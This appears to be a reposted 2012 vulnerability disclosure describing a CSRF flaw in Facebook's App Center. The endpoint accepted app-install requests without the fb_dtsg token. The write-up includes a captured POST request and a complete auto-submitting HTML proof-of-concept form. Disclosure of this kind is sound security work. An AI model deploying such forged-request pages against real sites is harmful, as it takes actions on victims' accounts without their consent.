Facebook CSRF

日期: 2012/08/22 | 标签: | 游览:559

 

I was previously working on apps, so decided to give a shot to this new feature. The game apps, when clicked “Play Game” button, was generating a POST request.

Example:

POST /connect/uiserver.php HTTP/1.1
Host: www.facebook.com
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:13.0) Gecko/20100101 Firefox/13.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Connection: keep-alive
Referer: https://www.facebook.com/appcenter/bubbleisland?fb_source=appcenter
Cookie: <user_cookies>
Content-Type: application/x-www-form-urlencoded
Content-Length: 800

fb_dtsg=AQA-UJ7c&perms=email%2Cpublish_actions&new_perms=ASLlW7IHiYKu-ZMcemoLEUlDlumPU0z7d0gOzKM5z2BfP1Z-zw8cdicB23IOy6AdtrbRYjH8aVKwjIfgWruVFWYpjz26INpaKwAQhsPclOtPvQ&orig_perms=ASKG-CjoMB7nJHLuWUICKb1rxAeU8wUcn7qi9rO2VwppP0UB1zJd7M4rZexK5spGmPrPbDPCHPaQBSKCGauSOx4pl-M-43-YbyP0Wxo9wmmsyQ&dubstep=1&new_user_session=1&grant_clicked=1&send_to_mobile_redirect_uri=https%3A%2F%2Fwww.facebook.com%2Fappcenter%2Fbubbleisland%3Ffb_source%3Dappcenter&app_id=124194560873&redirect_uri=https%3A%2F%2Fapps.facebook.com%2Fbubbleisland%2F%3Ffb_source%3Dappcenter%26fb_appcenter%3D1&app_center=1&is_paid_app=&app_center_ref=appcenter&response_type=none&from_post=1&__uiserv_method=permissions.request&grant_clicked=Play+Game&GdpEmailBucket_grantEmailType=contact_email&audience%5B501245709901917%5D%5Bvalue%5D=40

There are many new parameters added in this new feature. Parameter ‘fb_dtsg’ is like token and ‘perm’ are the permissions required by the apps. Parameters ‘redirect_url’,’app_id’ are app specific values. Remaining parameters seems static except ‘new_perms’ & ‘orig_perms’. I started to play with these two dynamic params and after few attempts, I knew that these params no longer needed to add an app.
Anti-CSRF tokens like ‘fb_dtsg’ supposed to get validated at server-side. I was shocked to see that in this new feature, somehow developer missed this point and it was possible to add app without ‘fb_dtsg’. Bang!!

Final PoC for this CSRF looks like this:

<html>
<head>
</head>
<body onload=document.forms[0].submit();>
<form action=”https://www.facebook.com/connect/uiserver.php” method=”POST”>
<input type=”hidden” name=”perms” value=”” />
<input type=”hidden” name=”dubstep” value=1 />
<input type=”hidden” name=”new_user_session” value=1 />
<input type=”hidden” name=”grant_clicked” value=1 />
<input type=”hidden” name=”send_to_mobile_redirect_uri” value=”https%3A%2F%2Fwww.facebook.com%2Fappcenter%2Ftexas_holdem%3Ffb_source%3Dappcenter” />
<input type=”hidden” name=”app_id” value=”2389801228″ />
<input type=”hidden” name=”redirect_uri” value=”https%3A%2F%2Fapps.facebook.com%2Ftexas_holdem%2F%3Ffb_source%3Dappcenter%26fb_appcenter%3D1″ />
<input type=”hidden” name=”app_center” value=1 />
<input type=”hidden” name=”is_paid_app” value=”” />
<input type=”hidden” name=”app_center_ref” value=”appcenter” />
<input type=”hidden” name=”response_type” value=”none” />
<input type=”hidden” name=”from_post” value=1 />
<input type=”hidden” name=”__uiserv_method” value=”permissions.request” />
<input type=”hidden” name=”grant_clicked” value=”Play+Game” />
</form>
</body>
</html>

评论关闭。